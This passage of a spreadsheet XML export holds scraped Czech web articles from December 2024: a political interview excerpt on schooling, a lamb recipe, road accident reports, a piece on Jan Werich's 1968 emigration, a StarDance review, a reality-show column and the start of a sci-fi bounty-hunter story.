tedy vláda neudělala víc? Je pravda, že děláme jen kosmetické změny. Školství je postaveno na třech pilířích – lidi, obsah a systém. My měníme podmínky pro učitele, opečováváme lidské zdroje. Měníme i obsah, teď se dělá revize rámcových vzdělávacích programů. Ale 30 let jsme nesáhli na systém. Je potřeba sáhnout do architektury a prodloužit povinnou školní docházku. A proč se za tři roky nic nestalo? Na to je jednoduchá odpověď. Protože se tady často měnili ministři. Během čtyřletého období se ministři střídali jak panáci na orloji. Je to zodpovědnost hnutí STAN, které má v gesci ministerstvo školství? Je. Premiér nebude zasahovat do toho, koho si jednotlivé politické strany nominují. Nejdříve to byl pan Gazdík, pak pan Balaš, pak pan Bek. Nebyla tady kontinuita. To, co dnes říká pan ministr Bek, je někdy i v rozporu s tím, co si představovali pan Gazdík či Balaš. Starostové promrhali potenciál, který jim byl dán. Kdyby tady byl jeden ministr, věřím, že bychom byli dál. MOHLI JSTE PŘEHLÉDNOUT: Fialův výrok o německých platech? Vlastňák, přiznala Nerudová. Vysvětlení Vondry ji rozesmálo</t>
  </si>
  <si>
    <t>725</t>
  </si>
  <si>
    <t>20241201_161_3476296686_241dbdffb520d03df787.html</t>
  </si>
  <si>
    <t>241dbdffb520d03df787</t>
  </si>
  <si>
    <t>Jehněčí koleno podle Zdeňka Pohlreicha: Toto maso se špenátem chutná ženám i silným mužům</t>
  </si>
  <si>
    <t>Shrnutí Jehněčí koleno podle Zdeňka Pohlreicha : Toto maso se špenátem chutná ženám i silným mužům close Jan Danek jdm.foto / Shutterstock Kateřina Jelínková 1. 12. 2024 clock 3 minuty video Co tak uvařit k obědu? Kuře stokrát jinak bylo na talíři už tisíckrát, guláš také - ale na jehněčí maso pořád tak trochu zapomínáme, i když jsou jeho dietetické vlastnosti vynikající. Jehněčí koleno podle receptu známého šéfkuchaře Zdeňka Pohlreicha oslní i světaznalé gurmány. Kombinace skvělé chuti, jemné struktury, snadné stravitelnosti a nevelkého počtu kalorií i pro věčné dietáře - to je jehněčí maso. V kombinaci s čerstvým špenátem pak půjde o lahůdku, kterou si nechá ujít jen málokdo. Vůbec se nemusíte bát pro nás stále poněkud neobvyklé chuti tohoto masa. Uvidíte, že si toto jídlo zamilujete. Upéct si můžete také jehněčí kýtu podle receptu z Kuchyně Lidlu na youtube: Zdroj: Youtube Suroviny máte doma Jehněčí kolínko podle Zdeňka Pohlreicha bude sice vyžadovat trochu času na přípravu, ale gastronomický zážitek na konci našeho snažení vše vynahradí. Nejprve si tedy připravíme maso (následující recept počítá s 1,2 kilogramy jehněčích kolen), olej, jednu mrkev, tři cibule, tři stonky řapíkatého celeru, pět stroužků česneku, sklenku červeného vína , máslo, majoránku, listový špenát, olivový olej, smetanu, pepř a sůl. Jde tedy v podstatě o ingredience, které se s velkou pravděpodobností najdou v každé kuchyni i bez velkého dokupování. Nakrájet, nasolit a orestovat Nyní přichází čas na samotnou přípravu pokrmu. V první fázi si nakrájejte oloupanou cibuli a mrkev a stonky řapíkatého celeru bez listů. Jakmile bude toto připravené, můžete se vrhnout na maso, které je třeba osolit, opepřit a pak také otestovat na oleji. Dávejte si pozor, aby byla kolínka opečená ze všech stran. Hotovo? Vyndejte maso, slijte šťávu (budete ji ještě potřebovat), do pánve přilijte trochu oleje a můžete pokračovat. close Pečené brambory jsou k tomuto pokrmu ideální. Bez zeleniny to nejde Nyní bude pánev patřit jedné ze tří cibulí, mrkvi, celeru a třem stroužkům česneku. Vše nechte chvíli orestovat a zalijte vínem , které je třeba nechat zredukovat přibližně na polovinu. Až budete mít hotovo, přidejte do pánve kolínka a majoránku. Vše nechte pomalu dusit klidně čtyři hodiny. Chceme, aby se maso na talíři doslova rozsýpalo. Zahustit omáčku a připravit špenát Po uvedené době již jen vyjmete maso a omáčku zahustíte máslem. Nejprve ji ale bude potřeba přecedit, aby zůstala hladká bez hrubších příměsí. Tato část připravovaného pokrmu bude tímto hotová, a tak se můžete pustit do špenátu. Je to jednoduché: zbylou nakrájenou cibuli a rozmačkaný česnek orestujte na olivovém oleji, přidejte nakrájené špenátové listy, nakrájené listy celeru (zbyly z první fáze přípravy) a vše podlijte vodou. Po chvíli čekání, až jsou listy špenátu měkké a voda zmizí, přilijte na pánev asi dvě lžíce smetany, vše dochuťte podle nejlepšího pocitu solí a pepřem - a můžete zvát rodinu, nebo hosty, ke stolu. Související články video S čím si tuto lahůdku vychutnáte? S čím je vhodné takovou dobrotu servírovat? Nic nezkazíte vařenými, případně opečenými brambory, dobré budou také bramborové knedlíky. Jsou ale i lidé, kteří v tomto případě přísahají na bramborovou kaši. Inu, chutí je tolik, kolik je lidí. Ale tohle jídlo si jistě získá sympatie většiny strávníků.</t>
  </si>
  <si>
    <t>114630</t>
  </si>
  <si>
    <t>20241201_162_3476200298_d4555440605e3b1505a6.html</t>
  </si>
  <si>
    <t>d4555440605e3b1505a6</t>
  </si>
  <si>
    <t>V listopadu na silnicích v Moravskoslezském kraji zemřeli tři lidé, loni pět</t>
  </si>
  <si>
    <t>V listopadu na silnicích v Moravskoslezském kraji zemřeli tři lidé, loni pět V listopadu zemřeli při dopravních nehodách na silnicích v Moravskoslezském kraji tři lidé, o dva méně než ve stejném období loni. Od začátku roku si nehody v kraji vyžádaly 29 životů. Vyplývá to z předběžných statistik dopravní policie. V listopadu se stalo 1013 nehod, což je o 43 méně než loni. Při nehodách byli čtyři lidé těžce zraněni, 174 lehce. Celková škoda byla vyčíslena na 75,74 milionu korun, což je pod ročním průměrem. Mezi oběťmi nehod byla cyklistka narozená v roce 1965, kterou počátkem měsíce srazil na Karvinsku řidič osobního auta, jenž byl pod vlivem alkoholu . Zemřel také řidič auta, který 10. listopadu na Novojičínsku v příborské místní části Hájov vyjel mimo silnici a vrazil do stromu. Poslední listopadovou obětí nehod v kraji byl dvaatřicetiletý muž, který na zastávce v Ostravě -Dubině spadl pod přijíždějící tramvaj. Muž se zřejmě pokusil otevřít dveře tramvaje dříve, než zastavila. Nejčastější příčinou nehod bylo nepřizpůsobení jízdy okolnostem, druhou nejčastější příčinou bylo nedání přednosti. Nejvíce nehod se stalo ve středu 27. listopadu, celkem 56. Autor: external Rubrika transition_slide Zprávy &amp;gt; Doprava</t>
  </si>
  <si>
    <t>121540</t>
  </si>
  <si>
    <t>99450</t>
  </si>
  <si>
    <t>20241201_163_3476206481_09d39783b370ed37abd1.html</t>
  </si>
  <si>
    <t>09d39783b370ed37abd1</t>
  </si>
  <si>
    <t>Jan Werich a jeho druhý útěk do Ameriky: Na západ mu pomohli pohraničníci, stesk ho hnal zpátky domů</t>
  </si>
  <si>
    <t>Jan Werich a jeho druhý útěk do Ameriky : Na západ mu pomohli pohraničníci, stesk ho hnal zpátky domů Jan Werich byl jednak velmi inteligentní člověk, ale také jedinec, který jaksi nedokázal před někým, koho považoval za hlupáka, sklonit hřbet. A proto také dvakrát emigroval. Poprvé to bylo kvůli Hitlerovi, podruhé za to mohla sovětská okupace v roce 1968. A právě na tuto etapu jeho života se nyní zaměříme. Věděli jste, že mu k přechodu přes hranici dopomohli pohraničníci? Jan Werich (6. 2. 1905 až 31. 10. 1980) byl filmový a divadelní herec, také dramatik, scenárista, spisovatel, představitel avantgardy a partner Jiřího Voskovce a Jaroslava Ježka . V roce 1963 získal titul národního umělce. Mohlo by Vás zajímat: Stella Zázvorková : S Werichem pořádala legendární večírky. V pití byla neporazitelná, neznala totiž kocovinu Náročný rok Jana Wericha Šedesátá léta byla k Janu Werichovi vlídná. Nikdo mu nic nezakazoval, vycházely také jeho knihy, a ani na nové herecké role si stěžovat nemohl. Dokonce se začal vysílat jeho pořad Co tomu říkáte, pane Werich , kde glosoval aktuální dění. Tím si ale pod sebou, tak trochu, podřezal větev. Kdo ale mohl tušit, že se do země přihrnou sovětská vojska . Pouhé tři dny před jejich příchodem v roce 1968 se obul do vládnoucí Komunistické strany , u níž podotkl, že by se měla "očistit". "Nestraníci nemůžou stát kolem, mít ruce v kapsách, lelkovat a pozorovat to. Naopak. Já se domnívám, že by si měli dýchnout na brýle, protože oni viděj. Oni vědí, kdo je co zač. Stejně jako hlasitě říkaj, co chtěj a koho nechtěj," řekl tehdy. Není tak divu, že ho obavy z toho, co by mohlo nastat, pak dohnaly k rozhodnutí podruhé emigrovat za Jiřím Voskovcem do Ameriky . To ale ještě nevěděl, že ho čeká dlouhá cesta, jež skončí poměrně neslavně. Mohlo by Vás zajímat: Císařův pekař: Co měl společného hercův psací stroj Zeta a prezident Novotný? To uměl vysvětlit jen Jan Werich Nečekaná pomoc přes hranice Příslušníci pohraniční stráže byli vždy věrní. Hranice střežili psy i zbraněmi. Když ale do Československa vstoupila vojska Varšavské smlouvy, mnozí z nich se rozhodli dát najevo, že s aktuální situací v zemi rozhodně nesouhlasí . A tak začali lidi, mimo jiné, sami ilegálně převádět za hranice. V té době se také Werich rozhodl, že s manželkou emigruje do Německa a odtamtud pak do Vídně . Celou věc inicioval poslanec Národního shromáždění Jiří Pelikán , který Werichovým přechod přes hranice domluvil. Nejprve je pohraničníci převezli na chatu v Anníně, která sloužila k rekreačním účelům. Druhý den se pak přemístili na další chatu, tentokrát v Alžbětíně. Oba byli jako na trní kvůli zprávám, které slyšeli v rádiu. Naléhali tak na příslušníky pohraniční stráže, aby je dostali co nejrychleji pryč. Ti jim nakonec vyhověli, ale Werichovi museli slíbit, že se v Rakousku přihlásí na československou ambasádu, budou plnit jejich požadavky, nebudou vystupovat proti aktuálnímu politickému dění ve vlasti a rovněž odmítnou veškeré nabídky k rozhovoru, které vzejdou od Svobodné Evropy . Autem se zhasnutými světly je tak dovezli do vzdálenosti padesáti metrů od hranic. Odtud museli již pěšky. Mohlo by Vás zajímat: Osudové setkání Jana Wericha a Mileny Dvorské: Roli pohádkové Marušky od něj dostala díky prostějovským popelářům Z Ameriky ho nazpět vyhnal stesk Jakmile Werich unikl 25. srpna 1968 na západ, na nic nečekal a zamířil se svou ženou z Bavorska do hlavního města Rakouska , odkud kontaktoval svého nejlepšího přítele Jiřího Voskovce . Ten měl zatím za velkou louží plné ruce práce s informováním o tom, co se v Československu děje. Jak sám řekl, bylo potřeba kout železo, dokud bylo žhavé. Zájem médií byl vrtkavý. Ale i v tomto shonu myslel na kamaráda a začal Werichovi shánět práci i finance. Chtěl, aby i on vystoupil se svým svědectvím o okupaci. Se zhoršující se situací v zemi ale začal Jan Werich propadat pesimismu. Voskovec ho zapřísahal, ať se nevrací, stesk po rodině byl ale silnější. V říjnu se vrátili oba zpět do Prahy . Kromě stesku po domově, který hlavně zasáhl jeho ženu Zdenku, chtěl Werich také přijmout nabídku tehdejšího prezidenta Ludvíka Svobody , který ho chtěl poslat do Států jako reprezentanta československé kinematografie . Jenomže člověk míní a život mění. Byl tam prakticky jen na skok. V New Yorku onemocněl rozedmou plic, která ho málem stála život. Po návratu se zotavoval velmi pomalu. Pak ho, bohužel, čekalo dlouhé období, kdy "nic nesměl." Radost ze života si ale nenechal vzít. Mohlo by Vás zajímat: Jak Jan Werich slavil 70. narozeniny: Herec uždiboval speciálně pečenou šunku a zapíjel ji pivem Zdroje informací: Wikipedia.org: Jan Werich Deník.cz: Okupantům navzdory. Pohraničníci převedli tajně na západ i Jana Wericha Blesk.cz: Rok šedesát osm Jana Wericha - Před tanky utekl z Prahy do Vídně , málem přišel o ženua skoro zemřel Marta Jandová obětovala rakovině prsa, vaječníky i šanci na druhé dítě: Nechtěla jsem umřít jako bratr a maminka Autor: Kamil Šivák Autor Kamil Šivák</t>
  </si>
  <si>
    <t>134130</t>
  </si>
  <si>
    <t>20241201_164_3476191468_37688a543b195a8384f6.html</t>
  </si>
  <si>
    <t>37688a543b195a8384f6</t>
  </si>
  <si>
    <t>Vážná nehoda v Třebíči. Tři zranění lidé skončili v nemocnici</t>
  </si>
  <si>
    <t>Vážná nehoda v Třebíči . Tři zranění lidé skončili v nemocnici „Kolem sedmé hodiny ráno jela osmatřicetiletá řidička auta značky VW Passat po Sportovní ulici ve směru od Bráfovy ulice . Zřejmě při utírání zamlženého skla vyjela mimo komunikaci, kde narazila do sloupu," upřesnila informace policejní mluvčí Jana Kroutilová . Nehody Při nehodě se zranila řidička a její dvě spolujedoucí, všechny tři ženy byly zdravotnickou záchrannou službou převezeny na ošetření do nemocnice. Při dechové zkoušce u řidičky policisté požití alkoholu vyloučili. Dopravní nehodu šetří. Autor: Zuzana Musilová Autor Zuzana Musilová</t>
  </si>
  <si>
    <t>20241201_165_3476127391_115e12e2b477c754d745.html</t>
  </si>
  <si>
    <t>115e12e2b477c754d745</t>
  </si>
  <si>
    <t>Řidička dostala smyk, při následné havárii otočila auto na bok</t>
  </si>
  <si>
    <t>Řidička dostala smyk, při následné havárii otočila auto na bok Havárii osobního auta u Počátek řešili v uplynulém týdnu policisté. Ve středu 27. listopadu hodinu před půlnocí skončila řidička s autem na boku, při nehodě se zranila. „Třicetiletá řidička jedoucí na obec Stojčín s osobním vozidlem Renault zřejmě vlivem nepřiměřené rychlosti dostala s vozidlem smyk, který nezvládla a v silničním příkopu havarovala,“ popsala komisařka Michaela Lébrová . Řidička se při nehodě zranila a sanitka jí musela převézt do jindřichohradecké nemocnice. Dechová zkouška vyloučila přítomnost alkoholu , škoda na autě je předběžně vyčíslena na šedesát tisíc korun. Autor: Prokop Veselý Autor person Prokop Veselý</t>
  </si>
  <si>
    <t>8240</t>
  </si>
  <si>
    <t>20241201_166_3476131337_2c466a719919b8bff2d8.html</t>
  </si>
  <si>
    <t>2c466a719919b8bff2d8</t>
  </si>
  <si>
    <t>Fenomén Oskar Hes: amatér, co předčil profíky, pusťte si jeho druhý tanec</t>
  </si>
  <si>
    <t>Fenomén Oskar Hes : amatér, co předčil profíky, pusťte si jeho druhý tanec Především druhý tanec Oskara Hese byl něčím, co tady ještě nebylo. Kromě kvality, emocí a skvělého pojetí totiž mladý tanečník připomněl i odkaz nedávno zesnulého Davida Stypky . Taneční soutěž StarDance bez výjimky vládne sobotním večerům. Kloubí totiž zábavu, humor, tanec, něžnost, soutěž, celebrity. Zkrátka všechno, co většina diváků ocení. Poslední listopadový den byl navíc na tanečních parketech v něčem výjimečný a unikátní. Zasloužil se o to pětadvacetiletý mladík. Oskar Hes . První tanec vyrazil dech Hned v prvním tanci předvedl Oskar Hes neuvěřitelně kvalitní výkon. Za tanec na známou píseň od Anastacie posbíral skvělé hodnocení od poroty. Ta chválila pohyb jeho rukou, nohou, držení těla, výraz. Snad vše, co šlo. Osobně dodávám, že pokud někdo Oskara a jeho partnerku před tímto tancem neznal, bylo by pro něj opravdu složité rozeznat, který z těchto dvou soutěžících je a který není profesionální tanečník. Na tento kvalitní výkon navíc vtipně reagoval i další profesionální tanečník Dominik Vodička , který vystoupil vzápětí po tomto tanci. Použil následující slova: „ Po Oskarovi je vždycky těžké tančit ,“ s chválící narážkou na fakt, jak skvělý umělec Oskar je. Úryvek z prvního tance je k dispozici ve videu níže. Druhý tanec vehnal slzy do očí Jenže pak přišel tanec druhý a porotě nejvyšší známky s hodnotou 10 přestaly stačit. Oskar totiž spolu s Kateřinou Bartuňek Hrstkovou a dalšími dvěma profesionálními tanečníky pojal osobitě tanec na píseň Kříž , jejíž autorem je David Stypka . Tanec plný emocí, elegance, lehkosti a čisté kvality. I tady musel divák přemýšlet nad tím, kdo že to je vlastně tady profesionál a kdo amatér? U Hese opravdu nešlo najít ani chybičku. Druhý tanec tak očividně „dostal“ všechny přítomné. Celý sál mlčel, jako by všichni chtěli ten okamžik zadržet a nechat ho trvat co nejdéle. Tatiana Drexler , zkušená porotkyně, která toho viděla už opravdu hodně, měla v očích slzy. Moderátorka Tereza Kostková nechtěla sílu okamžiku narušovat dalšími otázkami. Až porotce Tománek lehce vrátil pozornost všech do přítomnosti trefným komentářem: „ Oskare , Vy jste tančil se skupinou profesionálů a oni byli horší než Vy .“ Bylo tak hned jasné, že se jednalo o jeden z nejlepších tanečních výkonů vůbec. Proto také všichni na jeho konci povstali. Oskarův tanec je možné zhlédnout ze záznamu České televize od 90. minuty ZDE . Odkaz Davida Stypky a edukace v oblasti závislostí Každého možná dojalo něco jiného. Celým tancem a okamžikem se ale táhla červená nit odkazující na Davida Stypku . Zesnulého zpěváka , který právě ve své písní Kříž kloubí témata jemu vlastní. Lidská bolest, láska a naděje. Kříž , který patrně odkazuje na břímě, které musí každý člověk v životě nést, aniž by mu rozuměl. Takové měl i sám Stypka . A právě jeho odchod ve velmi brzkém věku podtržený silným tanečním výkonem Oskara se propojil v tento okamžik a vytvořil výjimečný moment. Stejně tak si někteří přítomní mohli připomenout zesnutí otce Oskara . Taktéž ve velmi nízkém věku. A kdo Richarda Hese znal, viděl i v tomto připomenutí jakýsi apel na boj proti závislostem. To koneckonců bylo hlavní téma Oskarova tance, kterým chtěl dle vlastních slov podpořit všechny, kteří bojují se závislostmi. Mezi nimi kromě drog a telefonu zmínil v rozhovoru ihned po tanci i problematický alkohol . A tak proto si někteří i po tomto večeru mohou myslet, že Oskar Hes do StarDance nepatří. Především po druhém tanci. Svým výkonem totiž znovu předčil všechny ostatní. Navíc přidal naprosto unikátní disciplínu, ve které s ním ani nikdo další nesoutěžil. Taneční soutěž totiž povýšil na něco mnohem víc. Na prostor s přesahem, odkazem, a důležitým poselstvím pro společnost. Zdroje : ceskatelevize.cz , seznamzpravy.cz , mediaguru.cz , zeny.iprima.cz</t>
  </si>
  <si>
    <t>20241201_167_3476131130_210782c51df84ec66927.html</t>
  </si>
  <si>
    <t>210782c51df84ec66927</t>
  </si>
  <si>
    <t>Reality show Bachelor je neodolatelný výplach mozku</t>
  </si>
  <si>
    <t>Reality show Bachelor je neodolatelný výplach mozku Český Bachelor je kombinace umělých řas, strojených úsměvů a střihů na dokonalé břišáky hlavního hrdiny. Přesto je to můj malý hřích, kterému nemohu odolat. Tak špatně na tom nejsem Reality show jsou mojí „guilty pleasure“ . Celé to začalo u Love is blind. Když to přítel zjistil, podíval se na mě s výrazem člověka, kterého přinutili dívat se na dokument o vyplňování daňových přiznání a pronesl: „Ty, taková intelektuálka, studentka psychoanalýzy, která čte Hegela před spaním a koukáš na takový výplach mozku. To jsi mě tedy překvapila.“ Povýšenecký postoj mu vydržel do chvíle, než jsem ho přemluvila, aby se díval se mnou. A víte co? Dostalo ho to. Začal uprostřed série, protože u reality show je úplně jedno, kdy navážete – není to zrovna Anna Karenina . Druhý den už nervózně šoupal nohama a ptal se: „Kdy bude další část?“ A pak? Pak kvůli finálovému dílu dokonce odmítl sex. České verze světových reality show, třeba náš Bachelor , sice zavánějí lehkým pepíkovstvím, přesto musím uznat, že to producenti zvládli překvapivě dobře. Je to Výměna manželek pro mladší ročníky – jen místo umývání záchodů sleduji momenty, kdy se toxická blondýna a duševně nevyrovnaná bruneta hádají o tom, kdo má horší psychiatrickou diagnózu. A můžu si pohodlně mnout ruce a říkat si: „Zase tak špatně nejsem. Ve srovnání s tímhle má můj život relevanci.“ Manipulátorky jsou divácky nejatraktivnější I když to vypadá, jako by producenti vzali sud se střelným prachem a zapálili rozbušku, všechno je do detailu promyšlené a vykalkulované, aby mě u ničení si mozkových spojů udrželi. Na casting, kam se hlásí tisíce lidí, vybírají přesné typy podle osobnostních testů za pomoci armády odborníků z řad psychologie. Nejde o to najít normální lidi. Naopak, cílem je posbírat co nejbarevnější škálu osobností, od narcisů přes manipulátory až po takové ty typy, co na party vždycky skončí v koutě, protože se stydí říct „ahoj“. Tomu poslednímu se říká „introvert pro vyváženost“. Má se tak navodit dojem, že nejde jen o přehlídku ega a botoxu. A pak tu máme zlatý hřeb – problémové jedince a královny dramatu. Čím toxičtější osobnost, tím lépe. Taková Denisa alias Lucky Bee je moje oblíbená postava a je to přímo ukázkový příklad. Sice neumí vyslovit výraz „koexistovat“, ale zato má doktorát z deptání ostatních. Ve stejné vteřině, kdy rozcupuje soupeřku na kousky, dokáže u mužů vzbudit ochranitelský komplex. Producenti jí určitě každý večer líbají ruce. Bez takových by reality show byla jen nudná přehlídka dívek, co pijí Prosecco a zásobují nás prázdnými (v lepším případě) či sexistickými (horší varianta) frázemi. Toxické a výrazné typy bývají pod ochranou tvůrců pořadů, protože jsou divácky atraktivní a zajišťují sledovanost. A vůbec nevadí, že ne všichni hledají skutečnou lásku. Řada z žen se chce jednoduše propracovat do televize, protože i dočasná sláva se dá monetizovat. Followeři na jejich sociálních sítích přibývají a padají z toho koruny. Důkazem budiž, že některá děvčata obíhají castingy na všechny možné soutěže, ať už to jsou Miss nebo jiné reality show jako je Love Island. A já tomu rozumím, lepší, než vstávat každý den na směnný provoz do fabriky nebo sedět v kanclu za podprůměrný plat, vyplňovat tabulky a pak běžet do Alberta na slevy. A samotný „Bachelor“ Jan Sazovský? Nepochybuji o tom, že se na konkurzu sešel dav fešáků, ale Jan musel vypadat v plavkách nejlépe. Těch prostřihů na jeho břišáky a bicepsy je v pořadu snad ještě víc než záběrů na pomerančovníky a západy slunce, a to je co říct. A to není všechno, hlavní postava reality show vyniká ještě jedním talentem. Umí si sundávat a nasazovat sluneční brýle skutečně neodolatelným způsobem. Nasazuje si brýle před motorkou, u letadla nebo dokonce i jen tak, bez jakýchkoliv kulis a stále utáhne několikavteřinovou stopáž. Kdo z vás by tohle dal? Sice působí po celou dobu trochu placatě jako prázdná nádoba zabalená do role uhlazeného gentlemana, který se sice žen empaticky ptá: „Jak to tady na tebe působí?“, ale evidentně se v duchu chytá za hlavu se slovy „Kriste, že já raději nezůstal na Tinderu,“ ale třeba se ho ještě podaří tvůrcům pořadu rozpohybovat směrem do větší autenticity. Reality show, která nemá s realitou nic společného Jediné, s čím „reality show“ nemá nic společného, je realita. Upřímně, kolik z vás na prvním rande letělo v soukromým letadlem? A to je jen drobnost. Ve skutečnosti je to všechno dokonale promyšlený experiment. Celá situace je uměle vytvořená v prefabrikovaném prostředí, protože v takovou chvíli se lidé chovají způsobem, jakým by se v běžném životě nechovali, a to diváky táhne. Můžeme to připodobnit k experimentu Philipa Zimbarda , kde byli lidé vybráni, aby hráli role dozorců a vězňů. V Bachelorovi sice nemáme vězeňské prostředí, ale princip je stejný. Uměle dosazené role producenty, kteří manipulují scénářem, aby ve hře udrželi ty nejsilnější osobnosti kvůli sledovanosti. Neustálý přísun alkoholu , díky čemuž se účastníci stávají emocionálnějšími, zranitelnějšími a také …ano trapnějšími. A speciálně v Bachelorovi jsou různé hry, které mají zvyšovat napětí ve skupinové dynamice, aby se vyvolalo víc konfliktů. Tvůrci pořadu jistě jásají, když se vytvořila skupina „zlých“, a skupina „pravdoláskářek“, která neopomene poctít diváky moudry, že „nejdůležitější je být sám sebou.“ To si musím někam zapsat. A děsí mě představa, jakou partu bych si musela vybrat, kdybych tam byla.</t>
  </si>
  <si>
    <t>20241201_168_3476089180_bb497b1d7da843b105b3.html</t>
  </si>
  <si>
    <t>bb497b1d7da843b105b3</t>
  </si>
  <si>
    <t>John a Leo: Lovci odměn - (Sbírka povídek)</t>
  </si>
  <si>
    <t>John a Leo: Lovci odměn - (Sbírka povídek) Muž šel po nezpevněné, zaprášené ulici. Směřoval k hranaté budově, kde nad dveřmi svítil velký neonový nápis: Bar u Normana. Stoupl si před dveře a bouchl do panelu, tím se otevřely. Panty přitom trochu zaskřípaly. Vstoupil... Anotace: Krátký úryvek ze světa Lovců odměn, bratrů ve zbrani, kteří dělají nebezpečné, nevděčné řemeslo, kde riskují život, ale za nic na světě by tu práci nevyměnili. „Práce lovce odměn je náročná, ale za nic na světě bych ji nevyměnil.“ : John Reeves „Zažili jsme toho mnoho, mnoho vytrpěli, práce lovce odměn je špinavá a nevděčná záležitost, ale za nic na světě bych ji nevyměnil.“ :Leo Reeves Sektor Kalio………………………………………………………..(Periférie) Soustava…………………………………………………………………..NS-150 Planeta………………………………………………………………..New Orion Město………………………………………………………………………….Izabel Kolonie……………………………..Nezávislá kolonie Pozemské unie Rok………………………………2455.10.02 (Dle pozemského času) Muž šel po nezpevněné, zaprášené ulici. Směřoval k hranaté budově, kde nad dveřmi svítil velký neonový nápis: Bar u Normana. Stoupl si před dveře a bouchl do panelu, tím se otevřely. Panty přitom trochu zaskřípaly. Vstoupil dovnitř a zabouchl za sebou. Očima zapátral. Skoro všechna místa u stolů byla obsazená. U baru uviděl dvě volná místa. Jedna číšnice s útlejším pasem plnila svoji práci s jistou ráznou grácií a nešetřila úsměvy. Nikdo si nevšímal nově příchozího. Ani není třeba, jedním pohledem hned poznali muže, co do hostince chodil celkem pravidelně. Srovnal si límce kabátu, kapuci si stáhl dozadu a rukou si pročísl černé vlasy. Pomalu vykročil k baru, k jednomu z volných míst. Sedl si mezi muže, jež si hleděli svých drinků a jeho si ani nevšimli. Ale barman ano. „ Johne ! Rád tě zase vidím,“ na moment vytáhl z úst doutník, vyfoukl kouř a doutník pak vrátil mezi rty. „Jak se vede?“ „Normálně jako vždy, Normane.“ „Takže mizerně jako vždy,“ konstatoval Norman. John přikývl. „Něco na zlepšení dne?“ Doutník přesunul z pravého koutu na levý. Kouř doutníku ovanul Johnovu tvář. Kouř mu nevadil. „Jistě. Jedno to kořeněné pivo bych si rád dal.“ „Tvé oblíbené, dej mi chvilku.“ Vzal jeden skleněný půllitr, co měl připravený vedle výčepu. Do sklenice načepoval kořeněné pivo , pěna je, jak se patřila. Orosenou sklenici podal Johnovi , jenž s díky přijal. Vydatně se napil. Napůl vypitý půllitr položil na pult, levačkou si utřel rty a blaženě vydechl. „To bodlo! Hele, nato, jaká je tahle kolonie odlehlá, máš to nejlepší kořeněné pivo !“ Norman se napůl zazubil – tou druhou půlkou svíral doutník. „Ach, díky za kompliment,“ řekl s horší artikulací, jak rty přidržoval doutník. Naklonil se dopředu aby ho slyšel jenom John . „Mám dobré kontakty za Hranicí.“ Spiklenecky mrkl a víc už neřekl. Narovnal se a krátce potáhl z doutníku. John se zazubil a mrkl na oplátku. Popadl sklenici a rázně dopil pivo . Utřel si rty a spustil: „Nuže, Normane, kde je můj bratr?“ „Och, Lea najdeš v Zašívárně. Zmínil se, že v Šedé databázi bude hledat nové kontrakty. Moc jich nepřibylo, ale jistě si něco najdete.“ John položil na pult tři kredity, mávl na rozloučenou a šel k zadnímu vchodu. Krátce na to se objevil na dvoře, prošel prázdnou plochou a dorazil k malé budově, která byla součástí Normanova pozemku. Na panelu zadal sekvenci, která byla známá mezi lovci odměn. Dveře se otevřely. Vešel do předsíně a šel dál; dveře za ním se sami zavřely. Prošel potemnělou chodbou, na jehož konci byl korálový závěs. Odhrnul korále a vešel do místnosti kruhového půdorysu. Uprostřed místnosti byl kruhový terminál s přístupem do Šedé databáze. Podél zdi se nacházely stoly, kde posedávali další lovci odměn; různě diskutovali, pili drinky, či jen relaxovali po hotové práci. Jukebox, hrající něco, co připomíná jazz, byl hned vedle portálu do další místnosti, kde stropní holoprojektor promítal exotickou tanečnici; v koutě byl samoobslužní bar, kde si dopřávaly dvě krásné ženy, Salrmanky. Jeden lovec hrál šipky, jenže do terče, místo šipek, házel elegantně tvarované vrhací dýky, a byl velmi přesný. Šestice hráčů hráli karty u jednoho stolu, jež každá karta měla jiný tvar i velikost a sázky každým dalším proběhlým kolem jenom narůstaly. Rychle zatěkal očima a tam ho uviděl. Sám posedával u jednoho stolu a upíjel ze sklenky modravou tekutinu. Vykročil směrem, kde seděl Leo, pozdravil se s pár lovci, které zrovna obešel a přisedl si naproti bratrovi. „Ach, Johne , trvalo ti to.“ John mávl rukou. „Cesta krapet trvala, to jo. Menší problém, který byl vyřešen lusknutím prstu.“ Luskl prsty. Leo se napil modravé tekutiny. Denvelský rum, velmi kvalitní drink. Upřel na Johna pohled. „Co to byl za problém?“ „Jen pár chuligánů, nic víc. Jinak, Norman mi říkal, že jsi šel hledat kontrakt.“ „Ehm.“ „A?“ Leo se zazubil a řekl: „Bude se ti to líbit.“ John pozvedl obočí a šibalsky se usmál. *** Dvě jednomístné buginy brázdily kopcovitou krajinou. Prach za nimi se táhnul do dálky, trsy trávy lítaly vzduchem. Za sebou zanechávaly dost jasnou stopu brázd od kol. Jízda ještě trvala, než smykem bratři zabrzdili. V klidu vystoupili a protáhli se, byli krapet ztuhlí z dlouhého sezení v nepříliš pohodlných sedačkách. Jak buginy neměla okna, jsou oba dost zaprášení. John si stáhl brýle, které měl na ochranu vůči prachu. Podíval se na Lea a široce se usmál. „Pěkná jízda. Měli bychom to dělat častěji.“ „Ehm.“ Podíval se dolů, kde se mezi kopci rozkládala malá osada. Na kopcích se pásli turani, byli to ovcím podobná zvířata, menšího vzrůstu, plachá a nenáročná na chov. Dál za osadou byly kukuřičná, ječmenová a pšeničná pole, která tvořily hlavní zdroj obživy. „Tak tohle je ono?“ „Jo, Johne . Osadu trápí plenitelé, jak bylo psáno v kontraktu. Takže nabízejí dost slušnou částku za to, že se někdo zbaví jejich problému.“ John si promnul bradu. Díval se na budovy, které byly postaveny z prefabrikovaných dílů. Nepřišlo mu, že by byli nějak bohatí. „Nevypadají, že by měli sto tisíc kreditů.“ „Jo, Johne , taky si říkám. Ale co už, vždyť víš, jak o nás mluví.“ „Hm, moc dobře. Drsní samaritáni. Tak o nás mluví.“ Leo zamručel. Nasedli zpátky do bugin a nasměrovali si to k osadě. Jeli pomalu. *** Stáli uprostřed návsi, kde vyhlíželi starého muže, který jim, kulhavě, šel naproti. Obyvatelé osady byli uvnitř svých domků, a těch pár lidí, co byli venku, stáli opodál a s jistou odtažitostí sledovali Johna a Lea. „Bojí se nás.“ „Jo, Johne . Jsme ozbrojený, a neznají nás. Takže jsou opatrní.“ John zamručel. Očima těkal mezi budovy, jestli nezahlédne něco nekalého. Opatrnosti není nikdy dost. Opatrně k nim dokulhal stařičký mužík, který vypadal na šedesát let, nejspíš patřil k těm, co nepodstoupili genovou terapii dlouhověkosti. Stařík měl hůl, o kterou se těžce opíral. Měl krátké vlasy na 